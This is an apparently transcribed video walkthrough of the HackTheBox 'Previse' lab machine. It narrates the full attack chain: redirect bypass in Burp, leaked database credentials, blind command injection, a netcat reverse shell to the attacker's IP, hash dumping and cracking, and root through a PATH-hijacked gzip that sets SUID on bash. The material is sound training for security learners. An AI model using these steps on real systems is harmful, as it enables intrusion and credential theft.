Guys, welcome back. Hope you all are doing well. This is Mohammad Badrudduja, and today I am going to solve another machine from Hackthebox. The machine name is Previse, and the difficulty level of this machine is easy. But the interesting thing you will learn in this machine that sometime you will need to also take care about the blind vulnerability. So the web application running on this target machine has a vulnerability which is blind remote code execution, and we will see how we can exploit that and how we will identify that. So without wasting time, let's go and solve this machine. So as always, we will start with the Nmap. So Nmap space hyphen S capital V for the version enumeration space hyphen S capital C for default script, and the target IP is 10.10.11.104 space hyphen. I wanna save the result in a file in default.nmap because I already ran that nmap scan to save the time. So I just show you the result of this nmap scan default.nmap. And as you can see here, two ports are open, port number 22 and port number 80. Port number 22 default for SSH and open SSH 7.6 P1 Ubuntu is running. The target operating system is Ubuntu. Port number 80 TCP, it's open. Protocol is HTTP and Apache HTTPD 2.4.29 is running. Clear this and let's go start with the port number 80. I already made an entry, a record in the etc host file with previse.hackthebox, and you can also do that with creating a record in etc host file. So whenever I go and I try to open previse.hackthebox, I always redirect it to the login.php. That makes me think to go and go for the directory enumeration, and this time I am going to start the directory enumeration with the dir search tool. We can also use dub and we can also use gobuster, but this time I am going to use directory search so that you will get pretty well knowledge about different tools to perform the same task. So dir search space hyphen h. Here we will see all the switches, and dir search is a pretty good tool. You should try that also. So let's go and dir search space hyphen w for the word list, and the word list I'm going to use is user share dir search, and this directory, this dictionary file will come with the dir search. So once you install dir search, you will find this in the db, that is dictionary.tags space hyphen u for the target url http://previse.hackthebox space, and I am going to use actually extension. So space hyphen e for the extension, and you can use these extensions like php and asp.text, something like this. So whatever words exist inside this file, it is going to put .php or .asp, whatever you decided to put after that word, it will actually put that. So and there is one more is space hyphen f to force the extension. So whatever word it will take from the dictionary, it will put .php or .jpg after that word. So space hyphen f, and I wanna use php because as I see here, this is the php file. So we can see the directory and we can also see the file. So let's go for the file enumeration space. Next is we already defined w for the word list. You can also define suffix and prefix, uppercase, lowercase. You can go for the recursive. I also want to use space hyphen t and use 32. This is for the threads, concurrent connections. Space hyphen I. This is interesting. I want to use. I want to see only the results containing status code 200 or 300, 302, something like this. So how we will do this: space hyphen I 200 comma 300 to 310. Okay, so 200, and it will include 300, 301, 302 up to 310. Okay, if you want to exclude some status code, you can do this with hyphen lowercase x. If you want to add manual method for the HTTP get, post, put, option, trace, you can do this here. For to add the headers, you can use capital H, and for the cookies, user agent, you can do all these things. So this is pretty good tool, having a lot of options. Fine. And space hyphen O if you want to save the result in output file. There is one more, that is full URL. So in the result, I want full URL. So I'm going to say hyphen hyphen full URL. That's it. Hit enter, and it is started. So we find JS. So until it's finished, let's go and check the page source. So once we go in the page source, we find favicon.ico, favicon icon, which we already see here. It is custom. Sometimes that is also, favicon icon is also a good place to collect the information about the platform on which the web application is running. So login.php, we already have JS and CSS. These two folders or directory contains the JavaScript and CSS files. Site dot, let's go see this. Nothing interesting in that also. Yeah, so nothing interesting here. Go back to the results. Let's wait for the dir search to complete. Although we can try many more things. I already opened up the burp suite, so let's try with the burp suite, and we will try some SQL injection on this. So turning on the burp suite, and let's try admin and 1 2 3 4 5 6, hit enter. So invalid username and password, that's good. Come here to the burp suite, see this request, send this request to the repeater, go to the repeater, and here we can do more things. So if you want to automate the SQLi, so you can actually copy this request, save in a file, and pass this file with SQL map. But I would recommend to, whenever you are going to try something, you must have the manual approach. So let's try a few things like this and make URL encode. So Control U. Go here, convert selection, URL only key characters. So no need to actually encode this. Send it, and invalid username and password. Nothing is showing. So maybe there is blind SQL injection, but we can do more things. Come back here. Let's try admin, and with this 1 2 3 4 5 6, hit enter. Same. Okay. Admin, and let's say or sleep 10 seconds, and 1 2 3 4 5 6, hit enter. Same, but let's try this on the burp suite, because you will find the time here. So this is the sleep command, 0 matches. Okay, so I'm going to take this, copy, go back to the repeater and paste it here, send this. So right now you can see the response time is 205 milliseconds, and we are actually using here sleep 10 seconds. So the response time must increase, and there is no big difference, means this is not working. Okay, next thing you can try is this, send, um, or instead of a space I'm using plus, or 1 equals to 1. Hit enter, also not working. Although you can also try using characters. You can first this, you can create a file having all these signs like semicolon, colon, hash, at the rate, and with that you can fuzz these character. But the problem is here you always have 200 OK status code, so it is going to be a bit difficult. So you can try these approaches. I just show you that. And here come back to the dir search. As you see here, account.php, it has something with 4 KB size, but it's redirecting us to somewhere. And I think in this case, it's redirecting us to the login page. Again, config.php, it is interesting. This file is always interesting, but it has nothing, 0 bytes, and it has 200 code, so no benefit for this also. CSS, this is the directory, download.php, and it's also redirecting us to the login page, login page, all these redirecting us to the login page. Although these three files, these two actually, footer.php and header.php, having 200 and have something also, but no benefit because we already see the source. Um, it's redirecting us to the login page. And there is one file that is navigate or nav.php, which also contains something with 1 KB and has 200 status code. So this is going to be interesting. I'm going to take this URL and I'm going to copy this, go back here and come here, paste it, hit enter, and yeah, that has something. So as you can see, once I hover the cursor, mouse cursor on this accounts link, you can see left hand side bottom corner that it is going to the accounts.php, and accounts.php is going to redirect us to the login page. So actually everything is redirecting to the login.php. But in that case, because we have nowhere to go, so let's try to uh, bypass that redirection. And why I choose this, because once I click on this create account, so as you can see, it's redirected us to the login page. But once we go to the burp suite, go to the proxy HTTP history and accounts.php. Once you go to accounts.php, you will see the status code is 302 and it is redirecting us to the login page. But the thing interesting here is in the response, you will found the content of the create account.php file. So in my mind, if we uh, try to bypass this by changing the value of this 302 status code to 200, maybe we will bypass the redirection. So for that, I go to the intercept and make intercept is on, come back here and go back and create accounts. And as we can see, we found a request here. Right click and go to the do intercept and response to this request. So I actually want to capture the uh, response also, not only the request. Once I make forward, and as you can see, the response is also captured. And in the response, I'm going to change the status code from 302 to 200. Hit enter, not enter, make forward, and boom. So we successfully bypassed the redirection process and we got the page to create the new user account. So let's go and create the new user. And as you can see here, actually off this now. As you can see here, username and password must be between 5 to 32 characters. So I'm going to create one account that is um, user 123 and the password is 123456 123456 and create user. So now it's redirected us to the login page, but let's go and try to log in with user 123 and 123456. That is the username and password for us what we created. Login, don't save, and we are logged in. That is the best thing. Now we are in home. Accounts is for creating account, but we don't need now. Go to the file, click, and we found one file that is sitebackup.zip. So it is kind of I think all the files of this web application is zipped inside this backup file. So just try to uh, save this file, come here, and we already have it. So I'm going to just take this, paste it here, and extract that. So we extracted. Now let's go and see what's inside. So accounts.php, this is the file which have the functionality for creating account. So open with mousepad. Config.php, this is interesting. So once we click here, go here, and as you can see, we got the database connection string. We have the username for the database, password, and Previse is the database name. But the only problem is this database or MySQL is running on localhost, so we cannot connect now because we are on the remote end, right? Okay, accounts.php have the functionality to create account. You can check that. Maybe you found something interesting here. Um, okay, file logs. So user login.php, header.php, file access log, um, file delimiter, and it's using comma, space, and tab, footer.php. Okay, go back here. Let's say see file.php. So inside file.php, you see the developer used many times include function here. I'm interested in this part and these parts here. So file name, file size, file data, session user, and it is calling the database query here. There is a variable for SQL and they actually write the query. And this one, add file to the table with counter. So download file, row ID, row name, size, user, and upload time. Okay, fine. So these are the methods or functions they write here. Now, without wasting time, let's go and see the management menu because you are going to see all those functions here also. You see this upload file function also in the previous file what we see. So website status, and website status is interesting because SQL server is online and connected. There are 3 registered admins and one file is uploaded. What file is uploaded? This is the file is uploaded, so this is the one file. Okay, now let's see log data. So inside log data, what you see here in file log, uh, you can see these value, drop down value, comma, space, and tab. So what's here? I think Once you make submit, it will download one file for you. And yeah, once you hit enter, the method is post. So I'm interested in that. Let's see what we have. Submit and open file. Also go to the bug proxy, HTTP, and I'm going to see the logs.php. Uh, um, let's make it bigger and send it to the repeater. Go to the repeater, hit send again. Okay, so what you see here that we choose the comma, so that's why these fields are separated by comma, and this is the time, this is the username, and this is the file ID. And this time seems to be epoch time. And epoch time, you can, like if you say date, hit enter, you will see this date for today with the time. But if you want to see this date as epoch time, so you can use date space plus percentage s, and this is the epoch time. So if you go here, you will see these all the epoch time. So there is a chance of remote code execution, and I am going to try that. So let's say semicolon, and with the semicolon, let's say who am I, and hit send, and nothing is there. So there are three users. One is malware, well done, and user 123. So as you can see here, the time is, the response you get is in 348 milliseconds, and this is the byte of the file size. Fine. So let's say try ID and hit send, and you did not get any answer, and the time you can see is still 648 millisecond and the same number of bytes you found in the response. So the problem is maybe this command is executed but not showing here, but you can check this in another way. Like if I say ping, my purpose is to create a delay. If we found here in the response time, if we found delay, it means the command is executing. And how you will found the delay, or you make the delay in the response, the best way is to try ping. So ping plus, I'm using plus instead of space. So ping plus space hyphen c. I want to actually ping for 10 times, and space my machine 10.10.14.104. This is the IP of my machine, right? So if we found delay, it means uh, the command is executing in the backend or somewhere on the target machine. But how we will confirm? So to find the uh, correct evidence, let's capture here, because I want that target machine to ping my machine. So my machine is actually getting the ICMP packets or ping packets from the target machine, and I can capture that. So TCP dump space hyphen I for interface, and I'm going to use tunnel 0 interface, and I want capture 10 packets, um, and the protocol is going to be ICMP. Hit enter, it's listening now, and just hit send. Once you make send, go back and you can see my machine is actually capturing the response, and come back here. I still did not get any response. Now we get the response. In the result, there is nothing interesting, but if you go and see the response time, you will find that 9867 milliseconds. This means it confirms that the blind remote code execution vulnerability exists in this web application. So because this is the Linux target, and most of the Linux target come with netcat, so I'm going to use try netcat to get the reverse shell. So netcat plus, instead of space I'm using plus for the URL encoding, hyphen e plus slash bin slash bash space, target is 10.10.14.104. This is gonna be my machine or the attacker machine where we will get the reverse shell. And here I am going to start the listener netcat space hyphen nlvp on 9001. Hit enter. So my machine is listening. And here also I'm going to use 9001. Whatever port you want to use, you can use it. Hit send. Still we did not get any response. It means we get the reverse shell connection. So who am I? I am www data. So let's see if there is Python available, which version of Python is installed on that machine. So Python 3.6.9 means there is Python version. So Python 3 space hyphen c import pty dot spawn module and slash bin slash bash. Done. So export term is equal to xterm. Hit enter. Now we can use the clear command here. Okay, fine. So we are in the machine. So let's see how many users are there. Cat slash etc slash passwd grep, and I want to see how many users can run bin bash. So there are only two users, root and m4l where, seems like malware. So these two users can run bin bash. So we already have database connection. So let's go and try to access the database. So mysql space hyphen h, this is going to be localhost space hyphen u for the user was root, space hyphen capital D is the database name is Previse. So Previse and space hyphen p. Hit enter. Now it's asking for the password, so we can take this password, copy, paste it here, hit enter, and we are inside the database. So because we are already mentioned here, I want to use this database, so we are already in this database. Now just show tables, show, oh sorry, come on, show tables. Yeah, so these are the two tables inside Previse database. Now I'm excited in the accounts, so let's see, select star from accounts, and you can see there are 3 users, but because on the system this user exists, so I'm just interested in that. So copy this, come here, clear nano hashes, hit enter, paste that hash and just save it. So cat hashes, yeah, it's there, clear, and let's unleash the John. So John hashes and space hyphen w is equal to slash user share word list and rocky.txt. Hit enter and control C because I also wanna mention this. So copy this, clear, and here before hashes I want to mention this format. Hit enter now and let it work. So until it's working, come back here, exit, and clear. We can also use hashcat for that. So if you want to use hashcat, you can use hashcat. But here I use John the Reaper. Let's wait for the results. So I'm going to pause the video until it's finished. Hey guys, welcome back. So I think because it's taking too much time, and we can run this John until it cracks the password, but because I already solved that machine, I know the password, so I'm going to start with that and let the John search the result for us. So the password actually for um, M4LWHERE. This is the user we found for which we are cracking the password, but because I already know the password, so I'm going to carry on. So the password is I love Cody and 112235 and apostrophe. Sorry. Um, yeah. Okay. Hit enter and get this is the password and we are logged in now as this user. So clear and ID. So this is the ID. Let's now do sudo space -l. Let's see whether this user can run command as root or not. So it's asking for password. I'm gonna again enter the same password. I love Cody 112235 and hit enter. So as you can see, this user can uh, execute this bash script. So let's go and see what this bash script do. So the first thing is ls space -la and paste this. So you can see the owner of this script is root, but we can run this script as this user malware, right? So now I want to see what this script is all about and hit enter. So this is the bash script. We always make sure to store logs. We take security seriously here. I know I should not run this as root, but I can't figure it out programmatically on my account. Okay, after all this, we found that once we run this, it's going to call the zip command and put in the backup by creating a date and slash underscore this file. So if we go ls space -la and we go inside this path slash, so you can see this is the date and date in this format. So year, then the month name and the date, then underscore access.gz. Similarly, it is going to actually put the files inside where backup with this name with the date. So as you can see this file, this is the year, month and date according to this, and then underscore file underscore access.gz. So these all interesting, but for me is interesting part, the part interesting to me is gzip. So whenever this is going to execute, it is calling the gzip command. So if we create, let's, I want to show you echo dollar and path. So whenever any command is going to execute on this machine, it is going to search from these paths, right? So if we put here one custom path that is controlled by attacker, we can go for the privilege escalation with that. So suppose cd/temp and I'm going to say export path is equal to and /temp $dollar path. And now if I make echo dollar $path, you can see now whenever any command is going to call on this machine, it is going to call first, it is going to see first inside this directory. If the machine did not get any gzip file or that called command file inside this directory, then it is going to see inside this, then this. So now the idea is to create a gzip file, and inside gzip file, whatever the bash script is there, it is going to execute as root. So come here, I'm going to create a gzip file. Uh, gzip, nano gzip, and here I am going to say /bin /bash and chmod u plus s and /bin/bash. So it is going to set the SUID bit on /bin/bash. So save it, and now cat gzip and base 64 and encode that string. Whatever we write inside the gzip, we encoded in the base 64 format. Now copy that string, come here, echo sorry paste that base 64 encoded script string, then decode it again with base 64 space -d. So you can see once we decode, we found the same content. So now what we need to do is echo paste base 64 space -d and then save it as gzip file. Now if we say cat gzip, so you can see inside gzip this is the content. Now ls space -la gzip, the file is created, but still we don't have the execution permission. So chmod space +x and gzip, done. Now whenever it is going to call gzip command, it is going to see first in the temp directory, and in the temp directory gzip is there and we have the execution command. So it is going to execute instead of legit gzip command, it is going to execute this command. Fine. And inside this command we are going to set the SUID bit set on /bin/bash. So if I say clear and ls space -la /bin/bash, hit enter, and you can see here now after successful exploit we will find here s. Okay, so where is sudo? Yeah, this is the command, ls space -la /bin/bash. And yeah, now as you can see, we have the SUID bit set, and the command, our command gzip is executed. Now just say /bin/bash space -p, hit enter, who am I, and we are root. ID, you can see the root. So if we go cd/root, we are inside the root directory, and there you found the root.txt. That's it. The machine is exploited. So if you like the content, please like, subscribe, and share as much as you can. And John is still running. I don't know why it's taking too much time, but once you do, please wait until it's finished and you will find the same password what I used, because I don't want to give a lot of time. So I just carried on, but once you did, so you will find the correct password, right? Thank you so much. See you in the next video. Bye.